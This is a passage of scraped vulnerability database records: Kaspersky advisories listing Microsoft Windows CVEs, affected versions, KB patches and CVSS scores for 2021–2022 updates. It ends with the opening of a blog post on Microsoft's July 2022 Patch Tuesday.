\n[CVE-2021-36932](<https://nvd.nist.gov/vuln/detail/CVE-2021-36932>) \n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-26431](<https://nvd.nist.gov/vuln/detail/CVE-2021-26431>) \n[CVE-2021-26426](<https://nvd.nist.gov/vuln/detail/CVE-2021-26426>) \n[CVE-2021-34536](<https://nvd.nist.gov/vuln/detail/CVE-2021-34536>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36933](<https://nvd.nist.gov/vuln/detail/CVE-2021-36933>) \n[CVE-2021-36938](<https://nvd.nist.gov/vuln/detail/CVE-2021-36938>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4023814](<http://support.microsoft.com/kb/4023814>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005031](<http://support.microsoft.com/kb/5005031>) \n[5005033](<http://support.microsoft.com/kb/5005033>) \n[5005030](<http://support.microsoft.com/kb/5005030>) \n[5005106](<http://support.microsoft.com/kb/5005106>) \n[5005040](<http://support.microsoft.com/kb/5005040>) \n[5005099](<http://support.microsoft.com/kb/5005099>) \n[5005043](<http://support.microsoft.com/kb/5005043>) \n[5005076](<http://support.microsoft.com/kb/5005076>) \n[5005094](<http://support.microsoft.com/kb/5005094>) \n[5011535](<http://support.microsoft.com/kb/5011535>) \n[5011564](<http://support.microsoft.com/kb/5011564>) \n[5011560](<http://support.microsoft.com/kb/5011560>) \n[5011527](<http://support.microsoft.com/kb/5011527>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12259 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36945", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-10-18T00:00:00", "id": "KLA12259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12259/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:27:42", "description": "### *Detect date*:\n07/12/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, bypass security restrictions, execute arbitrary code, obtain sensitive information, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>) \n[CVE-2022-30203](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30203>) \n[CVE-2022-22023](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22023>) \n[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) \n[CVE-2022-30211](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211>) \n[CVE-2022-30202](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30202>) \n[CVE-2022-22037](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22037>) \n[CVE-2022-22048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22048>) \n[CVE-2022-22036](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22036>) \n[CVE-2022-22028](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22028>) \n[CVE-2022-30205](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30205>) \n[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) \n[CVE-2022-30225](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30225>) \n[CVE-2022-21845](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21845>) \n[CVE-2022-22042](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22042>) \n[CVE-2022-30220](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30220>) \n[CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) \n[CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) \n[CVE-2022-30223](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30223>) \n[CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) \n[CVE-2022-30209](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30209>) \n[CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>) \n[CVE-2022-22050](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22050>) \n[CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) \n[CVE-2022-22043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22043>) \n[CVE-2022-30224](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30224>) \n[CVE-2022-22024](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22024>) \n[CVE-2022-22034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22034>) \n[CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>) \n[CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>) \n[CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>) \n[CVE-2022-30213](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30213>) \n[CVE-2022-22027](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22027>) \n[CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) \n[CVE-2022-29900](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29900>) \n[CVE-2022-23825](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23825>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-30206](<https://vulners.com/cve/CVE-2022-30206>)7.2High \n[CVE-2022-30203](<https://vulners.com/cve/CVE-2022-30203>)4.6Warning \n[CVE-2022-23825](<https://vulners.com/cve/CVE-2022-23825>)2.1Warning \n[CVE-2022-22023](<https://vulners.com/cve/CVE-2022-22023>)6.9High \n[CVE-2022-30221](<https://vulners.com/cve/CVE-2022-30221>)5.1High \n[CVE-2022-30211](<https://vulners.com/cve/CVE-2022-30211>)6.0High \n[CVE-2022-30202](<https://vulners.com/cve/CVE-2022-30202>)6.9High \n[CVE-2022-22037](<https://vulners.com/cve/CVE-2022-22037>)8.5Critical \n[CVE-2022-22048](<https://vulners.com/cve/CVE-2022-22048>)6.6High \n[CVE-2022-22036](<https://vulners.com/cve/CVE-2022-22036>)4.4Warning \n[CVE-2022-22028](<https://vulners.com/cve/CVE-2022-22028>)4.3Warning \n[CVE-2022-30205](<https://vulners.com/cve/CVE-2022-30205>)6.0High \n[CVE-2022-22047](<https://vulners.com/cve/CVE-2022-22047>)7.2High \n[CVE-2022-30225](<https://vulners.com/cve/CVE-2022-30225>)3.6Warning \n[CVE-2022-21845](<https://vulners.com/cve/CVE-2022-21845>)4.7Warning \n[CVE-2022-22042](<https://vulners.com/cve/CVE-2022-22042>)4.0Warning \n[CVE-2022-30220](<https://vulners.com/cve/CVE-2022-30220>)7.2High \n[CVE-2022-22039](<https://vulners.com/cve/CVE-2022-22039>)6.0High \n[CVE-2022-22049](<https://vulners.com/cve/CVE-2022-22049>)7.2High \n[CVE-2022-30223](<https://vulners.com/cve/CVE-2022-30223>)2.7Warning \n[CVE-2022-22026](<https://vulners.com/cve/CVE-2022-22026>)7.2High \n[CVE-2022-30209](<https://vulners.com/cve/CVE-2022-30209>)5.8High \n[CVE-2022-22040](<https://vulners.com/cve/CVE-2022-22040>)7.5Critical \n[CVE-2022-22050](<https://vulners.com/cve/CVE-2022-22050>)7.2High \n[CVE-2022-22025](<https://vulners.com/cve/CVE-2022-22025>)5.0Critical \n[CVE-2022-22043](<https://vulners.com/cve/CVE-2022-22043>)7.2High \n[CVE-2022-30224](<https://vulners.com/cve/CVE-2022-30224>)6.9High \n[CVE-2022-22024](<https://vulners.com/cve/CVE-2022-22024>)5.1High \n[CVE-2022-22034](<https://vulners.com/cve/CVE-2022-22034>)7.2High \n[CVE-2022-30226](<https://vulners.com/cve/CVE-2022-30226>)3.6Warning \n[CVE-2022-22022](<https://vulners.com/cve/CVE-2022-22022>)3.6Warning \n[CVE-2022-30208](<https://vulners.com/cve/CVE-2022-30208>)4.0Warning \n[CVE-2022-30213](<https://vulners.com/cve/CVE-2022-30213>)2.1Warning \n[CVE-2022-22027](<https://vulners.com/cve/CVE-2022-22027>)6.8High \n[CVE-2022-22029](<https://vulners.com/cve/CVE-2022-22029>)6.8High \n[CVE-2022-29900](<https://vulners.com/cve/CVE-2022-29900>)2.1Warning\n\n### *KB list*:\n[5015866](<http://support.microsoft.com/kb/5015866>) \n[5015862](<http://support.microsoft.com/kb/5015862>) \n[5015870](<http://support.microsoft.com/kb/5015870>) \n[5015861](<http://support.microsoft.com/kb/5015861>) \n[5023755](<http://support.microsoft.com/kb/5023755>) \n[5023754](<http://support.microsoft.com/kb/5023754>) \n[5023759](<http://support.microsoft.com/kb/5023759>) \n[5023769](<http://support.microsoft.com/kb/5023769>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "kaspersky", "title": "KLA12581 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-23825", "CVE-2022-29900", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-05-19T00:00:00", "id": "KLA12581", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12581/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T15:27:44", "description": "### *Detect date*:\n07/12/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, bypass security restrictions, obtain sensitive information, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 8.1 for 32-bit systems \nRemote Desktop client for Windows Desktop \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2016 \nWindows 10 Version 1607 for x64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows RT 8.1 \nWindows Server 2019 \nWindows Server 2012 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2022 \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 11 version 21H2 for ARM64-based Systems \nWindows 11 version 21H2 for x64-based Systems \nWindows Server 2019 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>) \n[CVE-2022-30222](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30222>) \n[CVE-2022-30203](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30203>) \n[CVE-2022-22023](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22023>) \n[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) \n[CVE-2022-30211](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211>) \n[CVE-2022-30214](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30214>) \n[CVE-2022-30212](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30212>) \n[CVE-2022-30202](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30202>) \n[CVE-2022-22037](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22037>) \n[CVE-2022-22031](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22031>) \n[CVE-2022-33644](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33644>) \n[CVE-2022-22048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22048>) \n[CVE-2022-22036](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22036>) \n[CVE-2022-22028](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22028>) \n[CVE-2022-30205](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30205>) \n[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) \n[CVE-2022-30225](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30225>) \n[CVE-2022-30216](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30216>) \n[CVE-2022-21845](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21845>) \n[CVE-2022-22042](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22042>) \n[CVE-2022-30220](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30220>) \n[CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) \n[CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) \n[CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) \n[CVE-2022-30223](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30223>) \n[CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) \n[CVE-2022-30209](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30209>) \n[CVE-2022-22711](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22711>) \n[CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>) \n[CVE-2022-22050](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22050>) \n[CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) \n[CVE-2022-22043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22043>) \n[CVE-2022-30224](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30224>) \n[CVE-2022-22024](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22024>) \n[CVE-2022-22034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22034>) \n[CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>) \n[CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>) \n[CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>) \n[CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>) \n[CVE-2022-30215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30215>) \n[CVE-2022-22045](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22045>) \n[CVE-2022-30213](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30213>) \n[CVE-2022-22027](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22027>) \n[CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) \n[CVE-2022-29900](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29900>) \n[CVE-2022-23825](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23825>) \n[CVE-2022-27776](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-27776>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-30206](<https://vulners.com/cve/CVE-2022-30206>)7.2High \n[CVE-2022-30222](<https://vulners.com/cve/CVE-2022-30222>)4.6Warning \n[CVE-2022-30203](<https://vulners.com/cve/CVE-2022-30203>)4.6Warning \n[CVE-2022-23825](<https://vulners.com/cve/CVE-2022-23825>)2.1Warning \n[CVE-2022-22023](<https://vulners.com/cve/CVE-2022-22023>)6.9High \n[CVE-2022-30221](<https://vulners.com/cve/CVE-2022-30221>)5.1High \n[CVE-2022-30211](<https://vulners.com/cve/CVE-2022-30211>)6.0High \n[CVE-2022-30214](<https://vulners.com/cve/CVE-2022-30214>)6.0High \n[CVE-2022-30212](<https://vulners.com/cve/CVE-2022-30212>)4.7Warning \n[CVE-2022-30202](<https://vulners.com/cve/CVE-2022-30202>)6.9High \n[CVE-2022-22037](<https://vulners.com/cve/CVE-2022-22037>)8.5Critical \n[CVE-2022-27776](<https://vulners.com/cve/CVE-2022-27776>)4.3Warning \n[CVE-2022-22031](<https://vulners.com/cve/CVE-2022-22031>)7.2High \n[CVE-2022-33644](<https://vulners.com/cve/CVE-2022-33644>)4.4Warning \n[CVE-2022-22048](<https://vulners.com/cve/CVE-2022-22048>)6.6High \n[CVE-2022-22036](<https://vulners.com/cve/CVE-2022-22036>)4.4Warning \n[CVE-2022-22028](<https://vulners.com/cve/CVE-2022-22028>)4.3Warning \n[CVE-2022-30205](<https://vulners.com/cve/CVE-2022-30205>)6.0High \n[CVE-2022-22047](<https://vulners.com/cve/CVE-2022-22047>)7.2High \n[CVE-2022-30225](<https://vulners.com/cve/CVE-2022-30225>)3.6Warning \n[CVE-2022-30216](<https://vulners.com/cve/CVE-2022-30216>)6.5High \n[CVE-2022-21845](<https://vulners.com/cve/CVE-2022-21845>)4.7Warning \n[CVE-2022-22042](<https://vulners.com/cve/CVE-2022-22042>)4.0Warning \n[CVE-2022-30220](<https://vulners.com/cve/CVE-2022-30220>)7.2High \n[CVE-2022-22039](<https://vulners.com/cve/CVE-2022-22039>)6.0High \n[CVE-2022-22038](<https://vulners.com/cve/CVE-2022-22038>)6.8High \n[CVE-2022-22049](<https://vulners.com/cve/CVE-2022-22049>)7.2High \n[CVE-2022-30223](<https://vulners.com/cve/CVE-2022-30223>)2.7Warning \n[CVE-2022-22026](<https://vulners.com/cve/CVE-2022-22026>)7.2High \n[CVE-2022-30209](<https://vulners.com/cve/CVE-2022-30209>)5.8High \n[CVE-2022-22711](<https://vulners.com/cve/CVE-2022-22711>)3.3Warning \n[CVE-2022-22040](<https://vulners.com/cve/CVE-2022-22040>)7.5Critical \n[CVE-2022-22050](<https://vulners.com/cve/CVE-2022-22050>)7.2High \n[CVE-2022-22025](<https://vulners.com/cve/CVE-2022-22025>)5.0Critical \n[CVE-2022-22043](<https://vulners.com/cve/CVE-2022-22043>)7.2High \n[CVE-2022-30224](<https://vulners.com/cve/CVE-2022-30224>)6.9High \n[CVE-2022-22024](<https://vulners.com/cve/CVE-2022-22024>)5.1High \n[CVE-2022-22034](<https://vulners.com/cve/CVE-2022-22034>)7.2High \n[CVE-2022-30226](<https://vulners.com/cve/CVE-2022-30226>)3.6Warning \n[CVE-2022-22041](<https://vulners.com/cve/CVE-2022-22041>)8.5Critical \n[CVE-2022-22022](<https://vulners.com/cve/CVE-2022-22022>)3.6Warning \n[CVE-2022-30208](<https://vulners.com/cve/CVE-2022-30208>)4.0Warning \n[CVE-2022-30215](<https://vulners.com/cve/CVE-2022-30215>)8.5Critical \n[CVE-2022-22045](<https://vulners.com/cve/CVE-2022-22045>)6.9High \n[CVE-2022-30213](<https://vulners.com/cve/CVE-2022-30213>)2.1Warning \n[CVE-2022-22027](<https://vulners.com/cve/CVE-2022-22027>)6.8High \n[CVE-2022-22029](<https://vulners.com/cve/CVE-2022-22029>)6.8High \n[CVE-2022-29900](<https://vulners.com/cve/CVE-2022-29900>)2.1Warning\n\n### *KB list*:\n[5015808](<http://support.microsoft.com/kb/5015808>) \n[5015875](<http://support.microsoft.com/kb/5015875>) \n[5015811](<http://support.microsoft.com/kb/5015811>) \n[5015863](<http://support.microsoft.com/kb/5015863>) \n[5015877](<http://support.microsoft.com/kb/5015877>) \n[5015807](<http://support.microsoft.com/kb/5015807>) \n[5015832](<http://support.microsoft.com/kb/5015832>) \n[5015874](<http://support.microsoft.com/kb/5015874>) \n[5015814](<http://support.microsoft.com/kb/5015814>) \n[5015827](<http://support.microsoft.com/kb/5015827>) \n[5023752](<http://support.microsoft.com/kb/5023752>) \n[5023764](<http://support.microsoft.com/kb/5023764>) \n[5023756](<http://support.microsoft.com/kb/5023756>) \n[5023713](<http://support.microsoft.com/kb/5023713>) \n[5023765](<http://support.microsoft.com/kb/5023765>) \n[5023698](<http://support.microsoft.com/kb/5023698>) \n[5023702](<http://support.microsoft.com/kb/5023702>) \n[5023696](<http://support.microsoft.com/kb/5023696>) \n[5023697](<http://support.microsoft.com/kb/5023697>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "kaspersky", "title": "KLA12580 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-23825", "CVE-2022-27776", "CVE-2022-29900", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226", "CVE-2022-33644"], "modified": "2023-05-19T00:00:00", "id": "KLA12580", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12580/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-08-14T11:59:47", "description": "Hello everyone! Microsoft has been acting weird lately. I mean the recent [publication of a propaganda report](<https://t.me/avleonovcom/1021>) about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn&#x27;t be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in theory, should be more or less neutral, does this\u2026 This is a clear signal. It&#x27;s not about business anymore. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239096>\n\nI&#x27;ll take a closer look at this report in the next episode of the Vulnerability Management news, but for now let&#x27;s take a look at Microsoft July Patch Tuesday. Yes, the vendor is behaving strangely, but Microsoft products need to be patched. Right? At least for now. And tracking vulnerabilities is always a good thing. \n\nOn July Patch Tuesday, July 12, 84 vulnerabilities were released. Between June and July Patch Tuesdays, 15 vulnerabilities were released. This gives us 99 vulnerabilities in the report. \n \n \n $ cat comments_links.txt \n Qualys|July 2022 Patch Tuesday. Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 